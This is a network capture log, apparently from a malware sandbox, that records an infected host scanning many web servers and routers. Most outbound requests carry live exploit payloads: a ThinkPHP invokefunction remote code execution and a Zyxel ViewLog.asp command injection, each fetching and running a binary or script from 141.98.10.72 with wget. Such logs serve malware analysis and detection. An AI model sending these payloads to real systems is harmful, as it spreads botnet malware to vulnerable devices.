Feb 14, 2024 09:30:10.056790113 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:09 GMT Date: Wed, 14 Feb 2024 08:30:09 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 39 26 23 34 36 3b 34 36 35 64 64 35 62 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.7f01002.1707899409.465dd5b1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
543	192.168.2.15	54212	95.142.35.91	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:10.010974884 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:10.378537893 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:10 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
544	192.168.2.15	42402	112.168.163.80	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:10.668281078 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
545	192.168.2.15	54908	112.192.21.185	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:10.994168043 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:12.664846897 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.648808002 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:18.776737928 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:26.712562084 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:42.584031105 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:14.071223974 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
546	192.168.2.15	33838	112.90.88.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.038671970 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
547	192.168.2.15	38656	95.179.193.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.612227917 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.804488897 CET	505	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:11 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 311 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 2e 6c 70 6d 69 74 63 68 65 6c 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at work.lpmitchell.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
548	192.168.2.15	54004	95.164.1.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.615892887 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.817478895 CET	578	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:11 GMT Server: Apache/2.4.41 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 328 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 32 30 37 34 38 33 34 2e 73 74 61 72 6b 2d 69 6e 64 75 73 74 72 69 65 73 2e 73 6f 6c 75 74 69 6f 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at vm2074834.stark-industries.solutions Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
549	192.168.2.15	34276	95.142.121.34	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.623507023 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.826921940 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Wed, 14 Feb 2024 08:30:11 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
550	192.168.2.15	35120	95.110.177.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.637296915 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.854536057 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:11 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
551	192.168.2.15	35480	95.68.75.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.639631033 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.865365982 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive
Feb 14, 2024 09:30:11.865377903 CET	17	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
552	192.168.2.15	59206	95.68.11.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:11.643542051 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:11.869751930 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive
Feb 14, 2024 09:30:11.870762110 CET	17	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
553	192.168.2.15	57022	31.136.112.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.285900116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:12.920963049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.168945074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:16.728835106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.848630905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.832422972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591947079 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550789118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
554	192.168.2.15	46862	31.136.12.206	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.291043997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.448818922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:21.592605114 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.624401093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687917948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:46.838293076 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
555	192.168.2.15	37648	31.132.79.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.292088032 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
556	192.168.2.15	38558	94.198.133.204	8080

Timestamp	Bytes transferred	Direction	Data
